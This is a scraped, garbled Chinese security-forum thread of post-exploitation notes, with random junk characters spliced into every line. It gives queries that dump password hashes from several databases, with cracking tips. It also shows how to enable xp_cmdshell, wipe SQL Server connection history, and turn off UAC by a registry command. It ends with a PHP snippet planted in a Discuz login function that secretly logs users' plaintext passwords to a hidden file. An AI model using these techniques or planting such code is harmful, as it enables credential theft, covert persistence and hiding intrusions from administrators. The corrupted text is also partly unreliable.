3 h$ E) s# g0 s+ z0 W" HSELECT password from master.dbo.sysxlogins where name='sa'
5 J: t- i2 t9 Y; i* l0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341+ x0 I9 `: J$ F% d
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
. n- D4 B. G: u$ I+ E1 }3 \% D0 T+ f& b N- q- l; u" P9 |
0×0100- constant header8 i7 v, z6 n5 }( P, t
34767D5C- salt4 [: B! U; }6 g$ }) b6 S, i
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
- B: y) ?6 c! }# q2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
+ I L, d1 t: i3 U; X" p+ V4 D8 Tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash3 `5 m4 q# |6 P3 Q) i0 _, D. j7 l0 w
SQL server 2005:-
( \* K/ L0 `7 G9 E: RSELECT password_hash FROM sys.sql_logins where name='sa'. s$ \; S6 c# C0 L6 N# n
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
6 T6 C* }" p$ v. |9 D% W0×0100- constant header6 @8 E$ }2 f `0 _% ]
993BF231-salt* e& o! [4 [; U# r# P# j4 b
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; R- W' i) d( W- jcrack case sensitive hash in cain, try brute force and dictionary based attacks.
, D/ D7 ]6 D; j. [$ ]) f
& K% r8 ?( f4 _- ?3 v- ]/ l$ mupdate:- following bernardo’s comments:-
u; D% W5 U# }' `: }use function fn_varbintohexstr() to cast password in a hex string.
- D8 U6 a9 X$ Q* \e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins& P- N! z4 m! t! {' j. ^
" p1 m j0 ]( e3 _: j( w* S9 r8 Z. L$ @
MYSQL:-
- r9 B6 Z0 a4 y' @" D; J- V
! |, W( L6 f' Q0 p- }In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.& [, c' B/ ^6 i3 D
2 f) K5 B4 [, K; M1 I3 z4 w
*mysql < 4.1
/ r. u1 l4 E8 y8 o( u, E' }, n& ~/ l( f3 Z& b
mysql> SELECT PASSWORD(‘mypass’);
8 E$ [ B, R9 t$ G- d. R+——————–+
& }! u: X) v3 Q& Y5 ^7 }. \| PASSWORD(‘mypass’) |: M& t2 F" ?5 r- j4 W
+——————–+
0 b4 j2 X$ O6 F| 6f8c114b58f2ce9e |& w/ | \. W8 {6 A
+——————–+
& S# L+ p9 S" K. h; ?
. J$ O8 Y: Y: ?$ V$ }' F*mysql >=4.1' H" u/ K9 C! _, w+ Y
& l5 J4 X j% j5 }mysql> SELECT PASSWORD(‘mypass’);
- m. a% }" b! ^ k+——————————————-+
. `1 D3 J- J' _& f" W# Z9 G| PASSWORD(‘mypass’) |$ J w |# F2 {+ d9 u& y
+——————————————-+9 [4 e3 U8 p) e9 H9 O
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
7 x& q. r4 i s( K3 |0 Y# j" s+——————————————-+' f: l0 H7 w8 d0 I/ N8 Q
+ |# ` G: T, m- X: |! b- eSelect user, password from mysql.user
/ v3 L5 s! W! }6 W3 ZThe hashes can be cracked in ‘cain and abel’
' K! U" B6 m4 `5 M8 b
0 `" a' L2 R9 J& Y2 XPostgres:-0 y# \3 A; ?3 X. D' i+ K$ T
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)7 E$ L5 x' G2 B) G
select usename, passwd from pg_shadow;
% d9 G0 S1 B, q& a: v( ^6 J; [usename | passwd
4 h2 _! h3 Z c; U. v- Y——————+————————————-
5 v2 f2 ]" l. |! T( Z' D; |testuser | md5fabb6d7172aadfda4753bf0507ed4396, G. A0 X }6 l, _: n A. O3 z! v' @
use mdcrack to crack these hashes:-$ n+ \5 P2 h; T. |" B; g' {
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
$ X( ~2 t2 k: D( Z) n, Y% g7 G7 C4 ?8 C1 _
Oracle:-
$ S+ M4 T* f* ^. s& g2 d6 V( h3 m8 z* Bselect name, password, spare4 from sys.user$
; K* ?6 ?8 @8 A# Z7 [# Nhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g/ w. G6 F- E9 ?9 u: E
More on Oracle later, i am a bit bored…., q- M7 M$ M( V1 b
7 ]$ p. v" J! e. o& @6 Y1 c4 H
) B7 l1 @3 f9 G9 N在sql server2005/2008中开启xp_cmdshell
: ^9 u1 e. K! W! X! n+ k-- To allow advanced options to be changed." g8 A% E9 W! S
EXEC sp_configure 'show advanced options', 1
; Y- Q( b o& U% T; n. vGO! [9 S. J$ p' C: u8 G
-- To update the currently configured value for advanced options.
8 Z } P% D/ [5 l& x" URECONFIGURE% W/ n* x# Q/ b1 [) H
GO
3 [" o3 _8 N. _-- To enable the feature./ t/ b: O5 {- z# P# W
EXEC sp_configure 'xp_cmdshell', 1# b# ^( M8 X8 f6 |! ~* j4 K$ W
GO8 o+ N5 l0 T2 R" F5 e9 N7 }, X
-- To update the currently configured value for this feature.
0 v3 U9 F4 T* MRECONFIGURE
0 N+ d* A/ W4 t8 f# WGO
' D& m7 u! M% q$ BSQL 2008 server日志清除,在清楚前一定要备份。" m* A( e: Q# P( R$ W* P+ Z( M6 K+ Q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:0 k, r$ N4 z+ N' t5 m1 s( v
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
, b; D4 a( j5 T
# g2 A# z' H" [对于SQL Server 2008以前的版本:
0 f7 n' P# J& |: @. \* VSQL Server 2005:2 N' Z4 n6 T3 J8 H5 E4 f
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat( x' \( e+ f1 K6 `6 U4 `( M
SQL Server 2000:
! v% C' I" Y- r( ^0 `清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。7 U# t: Q/ T3 ]" k. |9 E
2 p- d) i8 K, ?' j
本帖最后由 simeon 于 2013-1-3 09:51 编辑/ H1 I9 @7 O# n# S, B: J1 m
5 |9 M' H( _ Y0 g0 R" z/ _
+ L& V# F8 ]. Z7 o/ y
windows 2008 文件权限修改
5 o0 Z4 N5 ^+ }1 m( k; k. l. d# [1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
( A# y' U' _1 D+ ?. K& y$ g2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
! o, w0 ~# C Y一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,; {' X. h9 p f2 v0 v9 _5 R) O( j
; U% T$ \) h: T b, EWindows Registry Editor Version 5.00& }# n/ D) Y7 w+ w: C) V& { d9 x ^
[HKEY_CLASSES_ROOT\*\shell\runas]
/ N& P3 b4 F0 m. Y/ V. t, ], M@="管理员取得所有权"
, o" c1 B# m1 ?- O2 U"NoWorkingDirectory"=""- \: ?7 a& R4 [" ~; o8 H
[HKEY_CLASSES_ROOT\*\shell\runas\command]3 w4 W: c M- E4 [1 D2 {! p
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"% A- D4 S9 O; N7 d4 t1 [- _$ H
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 x" r. d3 R3 l" o/ k
[HKEY_CLASSES_ROOT\exefile\shell\runas2]! \# B$ f, C5 k7 q) @
@="管理员取得所有权"
7 v; `8 T* B f" U: G, |" A; c"NoWorkingDirectory"=""7 ], a5 ~6 T. ?4 d3 a
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]; e6 W N9 @6 B$ w) ~0 a% S
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 \6 a9 J# ^5 w7 n) ?$ s1 F- E
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"' X4 T" |9 z6 d' \4 g! C' O8 X
, ~9 ^- r( J |% n
[HKEY_CLASSES_ROOT\Directory\shell\runas]
1 z6 R9 e5 S3 s@="管理员取得所有权"& v, h+ p6 M, ?% R9 t* Y& M$ F
"NoWorkingDirectory"=""" C: ]: R* A( H: M" X/ Q- g9 {
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]. V9 T5 K5 v. e A
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"4 H* n5 `3 x* A
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"" u+ y* L3 {3 W( K3 a
! b; K0 ?1 o% i2 U1 V% `* }, ?. E+ Q2 e u* M6 I
win7右键“管理员取得所有权”.reg导入9 J. B- j- ]" x' W
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
1 I, H: I# }% P1、C:\Windows这个路径的“notepad.exe”不需要替换% k- S/ K% c& K
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
$ R/ C- p2 H. u; v5 N3、四个“notepad.exe.mui”不要管
7 Z; ]: ~6 }# D' B0 e% T3 E! p4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
3 Z0 f+ I8 D1 u- y# n ~: }9 b0 AC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
' J* B1 v; X/ g: E' [' M$ s替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
: m; }1 b" Z7 \- H c& J; Y替换完之后回到桌面,新建一个txt文档打开看看是不是变了。+ ]3 K( \' \* A
windows 2008中关闭安全策略: - [5 b- r9 v) |% N
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
% \, y0 o( F* @+ j) J" ^修改uc_client目录下的client.php 在
7 e9 t- _, G: v; P$ c1 Cfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
/ N8 E+ y) k% G# M& ^4 R) S" ^/ D下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
% l% H& L7 Z9 I, j+ e你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw6 I# R. \. F1 J
if(getenv('HTTP_CLIENT_IP')) {
& b U( T$ b* r2 |& [$onlineip = getenv('HTTP_CLIENT_IP');
# n. y# p& J0 k5 j} elseif(getenv('HTTP_X_FORWARDED_FOR')) {' S1 Q6 e& _) g/ I! d, W
$onlineip = getenv('HTTP_X_FORWARDED_FOR');1 s; o9 B/ D7 j% }' ]
} elseif(getenv('REMOTE_ADDR')) {, N7 V: ~) o: u1 n3 k# V
$onlineip = getenv('REMOTE_ADDR');% q A5 y3 j8 W/ O; X
} else {% g2 A% q( Y: T; m' q
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];) X" {; O9 v! G
}9 }/ ]3 a, j5 K% C- c' V. m
$showtime=date("Y-m-d H:i:s");
+ h. l6 t3 Z: \/ N0 }/ b( ]6 M $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";% [$ v7 q- W7 _) H0 H! T! i; H
$handle=fopen('./data/cache/csslog.php','a+'); M( q% V7 z, I, M8 D
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对